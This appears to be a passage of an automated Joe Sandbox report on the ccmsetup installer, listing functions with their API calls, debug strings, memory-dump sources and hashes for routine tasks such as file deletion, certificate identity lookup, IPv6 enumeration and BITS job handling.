                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0057E363
                                                                                          • &), xrefs: 0057E154
                                                                                          • 2), xrefs: 0057E1C0
                                                                                          • Failed to queue %s for deletion on reboot (0x%x), xrefs: 0057E3A1
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0057E24A
                                                                                          • Failed to delete %s (%lu). Renaming and queuing for deletion on reboot., xrefs: 0057E1D2
                                                                                          • MoveFileEx( pszFileName, szTempPath, MOVEFILE_REPLACE_EXISTING|MOVEFILE_WRITE_THROUGH ), xrefs: 0057E2B1
                                                                                          • ccmsetup.cpp, xrefs: 0057E23F
                                                                                          • ccmsetup.cpp, xrefs: 0057E370
                                                                                          • k, xrefs: 0057E1B6
                                                                                          • ccmsetup.cpp, xrefs: 0057E358
                                                                                          • ccmsetup.cpp, xrefs: 0057E257
                                                                                          • Failed to move %s to %s (0x%x), xrefs: 0057E2FD
                                                                                          • Deleted file %s, xrefs: 0057E15F
                                                                                          • ccmsetup.cpp, xrefs: 0057E2C7
                                                                                          • MoveFileEx( szTempPath, NULL, MOVEFILE_DELAY_UNTIL_REBOOT ), xrefs: 0057E35E
                                                                                          • ccmsetup.cpp, xrefs: 0057E2AB
                                                                                          • DEL, xrefs: 0057E202
                                                                                          • =), xrefs: 0057E2EA
                                                                                          • GetTempFileNameW(m_sDownloadDir, L"DEL", 0, szTempPath) > 0, xrefs: 0057E245
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$CurrentFileThread$Move$DeleteH_prolog3_catch_NameTemp
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$&)$2)$=)$CcmSetup::DeleteFileW$DEL$Deleted file %s$Failed to delete %s (%lu). Renaming and queuing for deletion on reboot.$Failed to move %s to %s (0x%x)$Failed to queue %s for deletion on reboot (0x%x)$G)$GetTempFileNameW(m_sDownloadDir, L"DEL", 0, szTempPath) > 0$MoveFileEx( pszFileName, szTempPath, MOVEFILE_REPLACE_EXISTING|MOVEFILE_WRITE_THROUGH )$MoveFileEx( szTempPath, NULL, MOVEFILE_DELAY_UNTIL_REBOOT )$Successfully renamed %s to %s and queued for deletion on reboot.$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$k
                                                                                          • API String ID: 3643783826-1241515096
                                                                                          • Opcode ID: a14c40fb8cee26f140ad5a9393ce9685e6a5eb06c299cbd1439eded2a4384506
                                                                                          • Instruction ID: 3b5d7c070a6d0b947b1411783dafa18d563e58f315b887b7734977a3c67b3a63
                                                                                          • Opcode Fuzzy Hash: a14c40fb8cee26f140ad5a9393ce9685e6a5eb06c299cbd1439eded2a4384506
                                                                                          • Instruction Fuzzy Hash: 3771A4B1940328BAEB30EFA49C4EBEA7EB9BB59B40F5040D5F508A7181D7754A84CB61
                                                                                          Function 0062B132 Relevance: 63.4, APIs: 5, Strings: 31, Instructions: 427threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0062B13C
                                                                                            • Part of subcall function 00609791: __EH_prolog3.LIBCMT ref: 00609798
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005A13E3: __EH_prolog3.LIBCMT ref: 005A13EA
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062B2E8
                                                                                            • Part of subcall function 0060A160: __EH_prolog3.LIBCMT ref: 0060A167
                                                                                            • Part of subcall function 00609891: __EH_prolog3.LIBCMT ref: 00609898
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062B36C
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062B49C
                                                                                            • Part of subcall function 00609E7C: __EH_prolog3.LIBCMT ref: 00609E83
                                                                                            • Part of subcall function 00609E7C: SysFreeString.OLEAUT32(?), ref: 00609EE2
                                                                                            • Part of subcall function 00609E7C: SysFreeString.OLEAUT32(00000000), ref: 00609F3F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062B68B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3$CurrentThread$FreeString$CloseH_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$(elemRoot = doc.GetRootElement())$+$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$/$C$CcmGetAADIdentity(L"", stAadIds)$CcmUtilLib::CcmSetAADOnboardingInfo$CcmUtilLib::UpdateAADOnboardingInfo(sClientAppId, sResourceUri, L"")$ClientId$Failed to persist AAD on-boarding info. Error 0x%x$No AAD tenants information found.$Persisted AAD on-boarding info.$ResourceUri$Skipping tenant '%s' as it's not matching the joined tenant '%s'$Tenant$Tenants$V$doc.LoadFromString(sOnboardingXml)$|Y}$:}
                                                                                          • API String ID: 2728243797-4119497972
                                                                                          • Opcode ID: 9c5a62c50aa08ae5428200680923960030f63156e2fb78b33226c1221304bb94
                                                                                          • Instruction ID: 00ba0a0dab9b3d856909345a760770ad9af44e4418cd29de01242b1f578e211a
                                                                                          • Opcode Fuzzy Hash: 9c5a62c50aa08ae5428200680923960030f63156e2fb78b33226c1221304bb94
                                                                                          • Instruction Fuzzy Hash: C2029D70C4425DEADB24DBA4CD4ABEDBBB5AF15304F1440E9E14877282DBB41B88DF61
                                                                                          Function 0061C078 Relevance: 63.2, APIs: 8, Strings: 28, Instructions: 191threadencryptionCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0061C07F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061C0DA
                                                                                            • Part of subcall function 0061CB62: __EH_prolog3_catch.LIBCMT ref: 0061CB69
                                                                                            • Part of subcall function 0061CB62: GetCurrentThreadId.KERNEL32 ref: 0061CBC6
                                                                                            • Part of subcall function 0061CB62: LocalFree.KERNEL32(00000000,CcmUtilLib::GetStringFromCertExtension,00000034,0061C1EE,00000000,1.2.840.113556.1.5.284.5,00000000,00000001,00000002,00000000,00000000,000000FF,00000000,000000FF,00000000,000000FF), ref: 0061CDC3
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061C16F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061C1CE
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061C218
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061C281
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061C2D0
                                                                                          • CertFreeCertificateContext.CRYPT32(00000000,00000000,1.2.840.113556.1.5.284.3,?,00000000,1.2.840.113556.1.5.284.2,00000002,00000000,1.2.840.113556.1.5.284.5,00000000,00000001,00000002,00000000,00000000,000000FF,00000000), ref: 0061C304
                                                                                          Strings
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0061C213
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 0061C28D
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 0061C1D6
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 0061C271
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 0061C2DC
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0061C27C
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0061C16A
                                                                                          • GetStringFromCertExtension(pCertContext, c_szOID_TenantId, stAadIds.sAADTenantID), xrefs: 0061C20E
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 0061C224
                                                                                          • GetStringFromCertExtension(pCertContext, c_szOID_AccountId, stAadIds.sAADUserID), xrefs: 0061C2C6
                                                                                          • 1.2.840.113556.1.5.284.3, xrefs: 0061C297
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 0061C2C0
                                                                                          • GetStringFromCertExtension(pCertContext, c_szOID_ClientId, stAadIds.sAADDeviceID), xrefs: 0061C277
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 0061C208
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 0061C1BE
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 0061C0E2
                                                                                          • 1.2.840.113556.1.5.284.2, xrefs: 0061C24C
                                                                                          • GetWPJCert(bUserStore, sUserSID, pCertContext), xrefs: 0061C165
                                                                                          • pCertContext != 0, xrefs: 0061C1C4
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0061C1C9
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 0061C177
                                                                                          • 1.2.840.113556.1.5.284.5, xrefs: 0061C1E3
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 0061C0CA
                                                                                          • CcmUtilLib::GetAADIdsFromWPJCert, xrefs: 0061C08C
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0061C0D5
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0061C2CB
                                                                                          • !sUserSID.empty(), xrefs: 0061C0D0
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 0061C15F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$FreeH_prolog3_catch$CertCertificateContextLocal
                                                                                          • String ID: !sUserSID.empty()$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$1.2.840.113556.1.5.284.2$1.2.840.113556.1.5.284.3$1.2.840.113556.1.5.284.5$CcmUtilLib::GetAADIdsFromWPJCert$GetStringFromCertExtension(pCertContext, c_szOID_AccountId, stAadIds.sAADUserID)$GetStringFromCertExtension(pCertContext, c_szOID_ClientId, stAadIds.sAADDeviceID)$GetStringFromCertExtension(pCertContext, c_szOID_TenantId, stAadIds.sAADTenantID)$GetWPJCert(bUserStore, sUserSID, pCertContext)$pCertContext != 0
                                                                                          • API String ID: 1816063395-1609411267
                                                                                          • Opcode ID: 088162497ad9c83d6d5586858eb8450c1a31ee2656eefb3bb59e2c1649bf3ff1
                                                                                          • Instruction ID: a7296e9d1a18f5252f69e9936ba453395e1d6f933dcc552e9ea98bd55a17c881
                                                                                          • Opcode Fuzzy Hash: 088162497ad9c83d6d5586858eb8450c1a31ee2656eefb3bb59e2c1649bf3ff1
                                                                                          • Instruction Fuzzy Hash: DD51B3B1AC4356BBDB11ABA08C0AFFE7E26AF45F70F184214F910673C2C7795A418791
                                                                                          Function 0067742C Relevance: 59.9, APIs: 8, Strings: 26, Instructions: 402threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00677436
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 006770AF: __EH_prolog3_GS.LIBCMT ref: 006770B6
                                                                                          • GetAdaptersAddresses.IPHLPAPI(00000017,00000000,00000000,?,?), ref: 006774F1
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00677540
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006775D1
                                                                                          • GetAdaptersAddresses.IPHLPAPI(00000017,00000000,00000000,?,?), ref: 006775FB
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00677637
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006777FE
                                                                                            • Part of subcall function 005F2FBF: vswprintf.LIBCMT ref: 005F2FF1
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006778A9
                                                                                          Strings
                                                                                          • GetAdaptersAddresses(AF_INET6, 0, NULL, pAddresses, &outBufLen), xrefs: 0067762D
                                                                                          • StringCchPrintfW(szIPv6Address, (sizeof(szIPv6Address)/sizeof(szIPv6Address[0])), L"%02X%02X:%02X%02X:%02X%02X:%02X%02X:%02X%02X:%, xrefs: 006777F4
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 0067763F
                                                                                          • IF type '%u' is filtered., xrefs: 006776F9
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 00677806
                                                                                          • CcmUtilLib::_GetIPV6AddressInformation, xrefs: 006774B9
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00677632
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 00677899
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 006775D9
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006778A4
                                                                                          • %02X%02X:%02X%02X:%02X%02X:%02X%02X:%02X%02X:%02X%02X:%02X%02X:%02X%02X, xrefs: 006777B4
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 00677548
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 006775C1
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 006777EE
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 00677627
                                                                                          • IPV6: %s, xrefs: 00677947
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006777F9
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006775CC
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0067753B
                                                                                          • %02X%02X:%02X%02X:%02X%02X:%02X%02X, xrefs: 0067785F
                                                                                          • dwRetVal, xrefs: 006775C7
                                                                                          • (pAddresses) != 0, xrefs: 00677536
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 00677530
                                                                                          • StringCchPrintfW(szIPv6Prefix, (sizeof(szIPv6Prefix)/sizeof(szIPv6Prefix[0])), L"%02X%02X:%02X%02X:%02X%02X:%02X%02X", p6Addr->sin, xrefs: 0067789F
                                                                                          • Failed to retrieve IPV6 address information., xrefs: 00677667
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 006778B1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$AdaptersAddresses$H_prolog3H_prolog3_H_prolog3_catch_vswprintf
                                                                                          • String ID: %02X%02X:%02X%02X:%02X%02X:%02X%02X$%02X%02X:%02X%02X:%02X%02X:%02X%02X:%02X%02X:%02X%02X:%02X%02X:%02X%02X$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$(pAddresses) != 0$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$CcmUtilLib::_GetIPV6AddressInformation$Failed to retrieve IPV6 address information.$GetAdaptersAddresses(AF_INET6, 0, NULL, pAddresses, &outBufLen)$IF type '%u' is filtered.$IPV6: %s$StringCchPrintfW(szIPv6Address, (sizeof(szIPv6Address)/sizeof(szIPv6Address[0])), L"%02X%02X:%02X%02X:%02X%02X:%02X%02X:%02X%02X:%$StringCchPrintfW(szIPv6Prefix, (sizeof(szIPv6Prefix)/sizeof(szIPv6Prefix[0])), L"%02X%02X:%02X%02X:%02X%02X:%02X%02X", p6Addr->sin$dwRetVal
                                                                                          • API String ID: 216554775-3308246989
                                                                                          • Opcode ID: c1b674a846f6ed71ced83e53f4036d3eb97dc6663aef9987637a850a8fffdb30
                                                                                          • Instruction ID: 07927c226834b6dccb19b43019c8859eb5272362de0df002215c14929e71f4b1
                                                                                          • Opcode Fuzzy Hash: c1b674a846f6ed71ced83e53f4036d3eb97dc6663aef9987637a850a8fffdb30
                                                                                          • Instruction Fuzzy Hash: 4FE1C6B1805299AADB60DB658C45FEABBB9BF45300F0481D5F25CE7282D7789F80CF64
                                                                                          Function 005B212B Relevance: 59.7, APIs: 8, Strings: 26, Instructions: 239threadcomCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005B2132
                                                                                          • CoCreateInstance.OLE32(00703364,00000000,00000017,006C29AC,?,CancelBitsJobs,0000003C,005828AF,?,CcmSetup::DownloadClientFilesByBits,00000240,00582282,?,?,?,?), ref: 005B21D0
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B2201
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B226D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B22B8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B231D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B2370
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B23D4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$CreateH_prolog3_catchInstance
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$0&l$CancelBitsJobs$spCopyJob->Cancel()$spCopyJob->GetDisplayName( &sTempName )$spEnumJobs->GetCount( &uCount )$spEnumJobs->Next( 1, &spCopyJob, 0 )$spManager->EnumJobs( 0x0001, &spEnumJobs )$spManager.createInstance(CLSID_BackgroundCopyManager)$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp
                                                                                          • API String ID: 1333685707-101662333
                                                                                          • Opcode ID: 233352b2797831309e5c9d71f7a6944c1034f79bd1473a213a1bd823b8e36dca
                                                                                          • Instruction ID: ce148d3c558a62194820e3a8a2daf2c391355b4b69fd56eb58bdcc7c68b5f000
                                                                                          • Opcode Fuzzy Hash: 233352b2797831309e5c9d71f7a6944c1034f79bd1473a213a1bd823b8e36dca
                                                                                          • Instruction Fuzzy Hash: F9918970D81259EBDB10DBA5C949FEEBFB5AF55B00F15404AF801B7381CB746A06CBA1
                                                                                          Function 00644040 Relevance: 59.7, APIs: 6, Strings: 28, Instructions: 222threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00644047
                                                                                            • Part of subcall function 006013B4: __EH_prolog3.LIBCMT ref: 006013BB
                                                                                            • Part of subcall function 0060B178: __EH_prolog3.LIBCMT ref: 0060B17F
                                                                                            • Part of subcall function 005B14FC: __EH_prolog3.LIBCMT ref: 005B1503
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00644152
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006441D2
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00644224
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00644273
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                            • Part of subcall function 0060C143: __EH_prolog3_catch.LIBCMT ref: 0060C14A
                                                                                            • Part of subcall function 0060C143: GetCurrentThreadId.KERNEL32 ref: 0060C1A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006442C4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3$H_prolog3_catchH_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$CCM::LocationServices::LSGetHomeMPFromWMI$Capabilities$CurrentManagementPoint$LSGetHomeMPFromWMI$Protocol$Version$root\ccm$select * from SMS_Authority$spEnum.Next(&spObject) == WBEM_S_NO_ERROR$spNS.Open(L"root\\ccm")$spNS.Query(c_sSMSAuthority, &spEnum)$spObject.GetString(L"CurrentManagementPoint", sHomeMP)$spObject.GetString(L"Protocol", sProtocol)
                                                                                          • API String ID: 355227296-2745819085
                                                                                          • Opcode ID: 67385142761794c89394530a3257f605ef3bacfc361fedcf8c7b8e37fa2c8841
                                                                                          • Instruction ID: b4cfebc80ef7b905087d37829cb4b112fb2565b31ac2f03e32925d6f0e252b12
                                                                                          • Opcode Fuzzy Hash: 67385142761794c89394530a3257f605ef3bacfc361fedcf8c7b8e37fa2c8841
                                                                                          • Instruction Fuzzy Hash: F581BC70941268AADB25EBA0DD0AFEE7F66FF91B00F044049F451BB3C2CBB85A45C765
                                                                                          Function 0058630E Relevance: 58.1, APIs: 7, Strings: 26, Instructions: 328threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00586318
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005863A9
                                                                                          • _rand.LIBCMT ref: 00586457
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005864B1
                                                                                          • _rand.LIBCMT ref: 005864F4
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058654F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058667B
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          Strings
                                                                                          • ccmsetup.cpp, xrefs: 005864BD
                                                                                          • Failed to find new accessible source. Retrying previous source., xrefs: 005865F0
                                                                                          • ccmsetup.cpp, xrefs: 0058655B
                                                                                          • Found available source %s, xrefs: 00586794
                                                                                          • ccmsetup.cpp, xrefs: 00586399
                                                                                          • ccmsetup.cpp, xrefs: 005864A1
                                                                                          • ccmsetup.cpp, xrefs: 0058653F
